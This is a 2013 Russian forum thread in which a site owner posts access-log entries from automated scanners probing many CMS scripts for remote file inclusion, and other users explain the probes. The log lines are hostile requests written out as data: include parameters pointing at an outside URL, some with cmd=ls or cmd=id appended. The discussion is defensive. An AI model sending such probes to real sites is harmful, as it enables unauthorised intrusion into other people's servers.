Форум программистов, компьютерный форум, киберфорум
Наши страницы
Безопасность сайтов и серверов
Войти
Регистрация
Восстановить пароль
 
Рейтинг 4.71/7: Рейтинг темы: голосов - 7, средняя оценка - 4.71
McSim
9 / 9 / 0
Регистрация: 18.01.2010
Сообщений: 66
1

странный поиск уязвимостей

25.12.2013, 00:01. Просмотров 1326. Ответов 8
Метки нет (Все метки)

Бодрого времени суток, форумчане!

Последнее время начал все чаще и чаще встречать в логах странные запросы к серверу
access.log
Код
89.108.117.145 - - [23/Dec/2013:23:22:50 +0400] "GET /0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
89.108.117.145 - - [23/Dec/2013:23:22:50 +0400] "GET /123flashchat.php?e107path=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
89.108.117.145 - - [23/Dec/2013:23:22:50 +0400] "GET /2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
89.108.117.145 - - [23/Dec/2013:23:22:50 +0400] "GET /22_ultimate/templates/header.php?mainpath=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
89.108.117.145 - - [23/Dec/2013:23:22:50 +0400] "GET /=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
89.108.117.145 - - [23/Dec/2013:23:22:50 +0400] "GET /?_CONFIG[files][functions_page]=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
89.108.117.145 - - [23/Dec/2013:23:22:50 +0400] "GET /?npage=-1&content_dir=http://www.google.com/humans.txt%00&cmd=ls HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
89.108.117.145 - - [23/Dec/2013:23:22:50 +0400] "GET /?npage=1&content_dir=http://www.google.com/humans.txt%00&cmd=ls HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
89.108.117.145 - - [23/Dec/2013:23:22:50 +0400] "GET /?show=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
89.108.117.145 - - [23/Dec/2013:23:22:50 +0400] "GET /A-Blog/navigation/donation.php?navigation_start=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
89.108.117.145 - - [23/Dec/2013:23:22:50 +0400] "GET /image.php?url=http://www.google.com/humans.txt??? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
84.204.26.219 - - [24/Dec/2013:00:34:22 +0400] "GET /A-Blog/navigation/latestnews.php?navigation_start=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
84.204.26.219 - - [24/Dec/2013:00:34:23 +0400] "GET /A-Blog/navigation/links.php?navigation_start=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
84.204.26.219 - - [24/Dec/2013:00:34:23 +0400] "GET /A-Blog/navigation/search.php?navigation_end=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
84.204.26.219 - - [24/Dec/2013:00:34:23 +0400] "GET /A-Blog/sources/myaccount.php?open_box=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
84.204.26.219 - - [24/Dec/2013:00:34:23 +0400] "GET /ACGVnews/header.php?PathNews=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
84.204.26.219 - - [24/Dec/2013:00:34:23 +0400] "GET /ATutor/documentation/common/frame_toc.php?section=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
84.204.26.219 - - [24/Dec/2013:00:34:23 +0400] "GET /ATutor/documentation/common/search.php?section=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
84.204.26.219 - - [24/Dec/2013:00:34:23 +0400] "GET /ATutor/documentation/common/vitals.inc.php?req_lang=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
84.204.26.219 - - [24/Dec/2013:00:34:23 +0400] "GET /image.php?url=http://www.google.com/humans.txt??? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
81.18.135.46 - - [24/Dec/2013:10:53:06 +0400] "GET /BE_config.php?_PSL[classdir]=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
81.18.135.46 - - [24/Dec/2013:10:53:07 +0400] "GET /BPNEWS/bn_smrep1.php?bnrep=http://www.google.com/humans.txt?& HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
81.18.135.46 - - [24/Dec/2013:10:53:07 +0400] "GET /Base/Application.php?pear_dir=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
81.18.135.46 - - [24/Dec/2013:10:53:08 +0400] "GET /Bcwb_PATH/dcontent/default.css.php?root_path_admin=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
81.18.135.46 - - [24/Dec/2013:10:53:08 +0400] "GET /Bcwb_PATH/include/startup.inc.php?root_path_admin=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
81.18.135.46 - - [24/Dec/2013:10:53:08 +0400] "GET /Bcwb_PATH/system/default.css.php?root_path_admin=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
81.18.135.46 - - [24/Dec/2013:10:53:08 +0400] "GET /Beautifier/Core.php?BEAUT_PATH=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
81.18.135.46 - - [24/Dec/2013:10:53:09 +0400] "GET /BetaBlockModules//Module/Module.php?path_prefix=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
81.18.135.46 - - [24/Dec/2013:10:53:09 +0400] "GET /BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
81.18.135.46 - - [24/Dec/2013:10:53:09 +0400] "GET /BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
81.18.135.46 - - [24/Dec/2013:10:53:10 +0400] "GET /image.php?url=http://www.google.com/humans.txt??? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
89.253.229.226 - - [24/Dec/2013:13:00:26 +0400] "GET /ATutor/include/classes/module/module.class.php?row[dir_name]=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
89.253.229.226 - - [24/Dec/2013:13:00:27 +0400] "GET /ATutor/include/classes/phpmailer/class.phpmailer.php?lang_path=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
89.253.229.226 - - [24/Dec/2013:13:00:27 +0400] "GET /AdaptCMS_Lite_1.4_2/plugins/rss_importer_functions.php?sitepath=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
89.253.229.226 - - [24/Dec/2013:13:00:27 +0400] "GET /Administration/Includes/configureText.php?path_prefix=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
89.253.229.226 - - [24/Dec/2013:13:00:27 +0400] "GET /Administration/Includes/contentHome.php?path_prefix=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
89.253.229.226 - - [24/Dec/2013:13:00:27 +0400] "GET /Administration/Includes/deleteContent.php?path_prefix=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
89.253.229.226 - - [24/Dec/2013:13:00:27 +0400] "GET /Administration/Includes/deleteUser.php?path_prefix=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
89.253.229.226 - - [24/Dec/2013:13:00:27 +0400] "GET /Administration/Includes/userHome.php?path_prefix=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
89.253.229.226 - - [24/Dec/2013:13:00:27 +0400] "GET /Agora_PATH//mdweb/admin/inc/organisations/country_insert.php?chemin_appli=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
89.253.229.226 - - [24/Dec/2013:13:00:27 +0400] "GET /Agora_PATH//mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
89.253.229.226 - - [24/Dec/2013:13:00:27 +0400] "GET /image.php?url=http://www.google.com/humans.txt??? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
77.222.56.208 - - [24/Dec/2013:20:40:20 +0400] "GET /abf_js.php?abs_pfad=http://www.google.com/humans.txt?&cmd=id HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
77.222.56.208 - - [24/Dec/2013:20:40:20 +0400] "GET /about.php?CONFIG[MWCHAT_Libs]=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
77.222.56.208 - - [24/Dec/2013:20:40:20 +0400] "GET /about.php?bibtexrootrel=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
77.222.56.208 - - [24/Dec/2013:20:40:20 +0400] "GET /aboutinfo.php?bibtexrootrel=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
77.222.56.208 - - [24/Dec/2013:20:40:20 +0400] "GET /acc.php?page=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
77.222.56.208 - - [24/Dec/2013:20:40:20 +0400] "GET /access/login.php?path_to_root=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
77.222.56.208 - - [24/Dec/2013:20:40:20 +0400] "GET /account.php?insPath=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
77.222.56.208 - - [24/Dec/2013:20:40:20 +0400] "GET /accsess/login.php?path_to_root=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
77.222.56.208 - - [24/Dec/2013:20:40:20 +0400] "GET /active/components/xmlrpc/client.php?c[components]=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
77.222.56.208 - - [24/Dec/2013:20:40:20 +0400] "GET /ad_main.php?_mygamefile=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
77.222.56.208 - - [24/Dec/2013:20:40:20 +0400] "GET /image.php?url=http://www.google.com/humans.txt??? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
84.204.26.219 - - [24/Dec/2013:23:11:45 +0400] "GET /admin/admin.php?path=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
84.204.26.219 - - [24/Dec/2013:23:11:45 +0400] "GET /admin/admin.php?site_url=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
84.204.26.219 - - [24/Dec/2013:23:11:45 +0400] "GET /admin/admin_forgotten_password.php?root_folder_path=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
84.204.26.219 - - [24/Dec/2013:23:11:45 +0400] "GET /admin/admin_news_bot.php?root_path=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
84.204.26.219 - - [24/Dec/2013:23:11:45 +0400] "GET /admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
84.204.26.219 - - [24/Dec/2013:23:11:45 +0400] "GET /admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
84.204.26.219 - - [24/Dec/2013:23:11:45 +0400] "GET /admin/admin_users.php?phpbb_root_path=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
84.204.26.219 - - [24/Dec/2013:23:11:45 +0400] "GET /admin/auth.php?xcart_dir=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
84.204.26.219 - - [24/Dec/2013:23:11:46 +0400] "GET /admin/auth/secure.php?cfgProgDir=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
84.204.26.219 - - [24/Dec/2013:23:11:46 +0400] "GET /admin/autoprompter.php?CONFIG[BASE_PATH]=http://www.google.com/humans.txt? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
84.204.26.219 - - [24/Dec/2013:23:11:46 +0400] "GET /image.php?url=http://www.google.com/humans.txt??? HTTP/1.1" 499 0 "http://*mysite-is-hidden*.ru/" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"

То, что, идет перебор уязвимых страниц разных CMS это понятно. Но причем тут =http://www.google.com/humans.txt?
Первый IP-шник долбал почти неделю раз в два часа по 11 запросов в секунду. Запросы всегда уникальные. Написал жалобу на abuse. Ответили, что претензию переправили клиенту - с этого IP запросы прекратились, но появились с других адресов...

Гоша с Яшей только отправляют на описание humans.txt. Про атаки с использованием такого файла тишина
0
Надоела реклама? Зарегистрируйтесь и она исчезнет полностью.
Similar
Эксперт
41792 / 34177 / 6122
Регистрация: 12.04.2006
Сообщений: 57,940
25.12.2013, 00:01
Ответы с готовыми решениями:

Странный скрипт
Зачем в mail.ru включен подобный код? <script type="text/javascript"...

Странный код - вирус на битрикс?
Навеяло отсюда: http://www.cyberforum.ru/1c-bitrix/thread646954.html ...

Поиск уязвимостей
Здравствуйте! Возможно не подходящий раздел, но другого раздела не нашел, где...

Поиск уязвимостей
Добрый день! Кто какие знает источник или источники где публикуются...

Автоматизированный поиск SQL и XSS-уязвимостей
Вообщем есть задание написать прогу на C# которая будет находить SQL и XSS...

8
zhvan
Универсальный программист
41 / 33 / 9
Регистрация: 21.12.2013
Сообщений: 374
Записей в блоге: 1
25.12.2013, 00:13 2
Цитата Сообщение от McSim Посмотреть сообщение
Но причем тут =http://www.google.com/humans.txt?
если это DoS-атака то не причем, так как заголовки на сервер можно отправить какие угодно
0
McSim
9 / 9 / 0
Регистрация: 18.01.2010
Сообщений: 66
25.12.2013, 00:27  [ТС] 3
школьники шалят?
уж очень слабая тогда DoS атака получается. Во первых все страницы с таким запросом отдают 404 ошибку. Во вторых сама страница не ресурсоемкая. Ведь задача DoS атаки положить сайт, и чем больше страница тратит ресурсов на ее формирование тем быстрее достигается результат. В третьих - однотипные запросы элементарно отсекаются, достаточно в настройки сервера внести пару строк и отправить его на 444 статус, или банить ip на непродолжительный промежуток времени (fail2ban к примеру задействовать)

не думаю, что это DoS - слишком уж просто
0
Camaro396
38 / 38 / 13
Регистрация: 22.07.2013
Сообщений: 197
25.12.2013, 14:29 4
Ищут уязвимость, при которой заданный файлик заинклудится в страницу. У меня то же самое.
0
McSim
9 / 9 / 0
Регистрация: 18.01.2010
Сообщений: 66
25.12.2013, 20:25  [ТС] 5
Цитата Сообщение от Camaro396 Посмотреть сообщение
Ищут уязвимость, при которой заданный файлик заинклудится в страницу. У меня то же самое.
И что может дать этот файл в странице? По сути можно абсолютно любой файл подставлять, но выбран именно этот, именно с гугла... Что в нем такого интересного?

кстати, ответ с abus
Кликните здесь для просмотра всего текста
25.12.2013, 13:06, "Vedyakin Roman via RT" <abuse@agava.com>:
Пнд Дек 23 06:02:09 2013, midelta писал:

> *Вск Дек 22 21:36:54 2013, webmaster@*mysite-is-hidden*.ru писал:
>> *Добрый день!
>>
>> *С IP адреса Вашей организации (89.108.117.145) была зафиксирована
>> *попытка взлома сайта *mysite-is-hidden*.ru
>>
>> *прошу Вас предотвратить последующие попытки взломов
>>
>> *лог-файл обращений к сайту во вложении
> *Здравствуйте.
>
> *Ваша жалоба передана нашему клиенту.

Здравствуйте, благодарим за письмо, проблема решена нашим клиентом, в
случае повторной активности, пожалуйста, пришлите нам все имеющиеся
данные по инциденту.
--


первый раз отвечают на подобные запросы в abus - большой плюс компании
0
Camaro396
38 / 38 / 13
Регистрация: 22.07.2013
Сообщений: 197
25.12.2013, 21:28 6
Он увидит содержимое файла в тексте страницы и поймёт, что возможен удалённый инклуд. А дальше - по обстоятельствам.
0
McSim
9 / 9 / 0
Регистрация: 18.01.2010
Сообщений: 66
25.12.2013, 21:44  [ТС] 7
хм
ради прикола скормить ему такой файл... посмотреть что будет делать дальше...

Добавлено через 8 минут
плохо что nginx не умеет строить location по аргументу
0
zhvan
Универсальный программист
41 / 33 / 9
Регистрация: 21.12.2013
Сообщений: 374
Записей в блоге: 1
25.12.2013, 21:46 8
Цитата Сообщение от McSim Посмотреть сообщение
плохо что nginx не умеет строить location по аргументу
почему не умеет? умеет, для этого скрипты существуют
0
McSim
9 / 9 / 0
Регистрация: 18.01.2010
Сообщений: 66
25.12.2013, 21:50  [ТС] 9
есть пример? с удовольствием воспользуюсь

http://wiki.nginx.org/HttpCoreModule#location
The location directive only tries to match from the first / after the hostname, to just before the first ? or #. (Within that range, it matches the unescaped url.)
0
25.12.2013, 21:50
MoreAnswers
Эксперт
37091 / 29110 / 5898
Регистрация: 17.06.2006
Сообщений: 43,301
25.12.2013, 21:50

Поиск ошибок и уязвимостей в коде отправки данных из формы html в БД MySQL
Здравствуйте. Я приступил к изучению отправки данных из форм html в БД MySQL. Я...

Странный поиск
как то странно работает функция find вот кусок кода: switch (count) { case...

Странный бинарный поиск
Должно находить элемент в позиции 5, а у меня находит в позиции 6. Почему...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
9
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2018, vBulletin Solutions, Inc.
Рейтинг@Mail.ru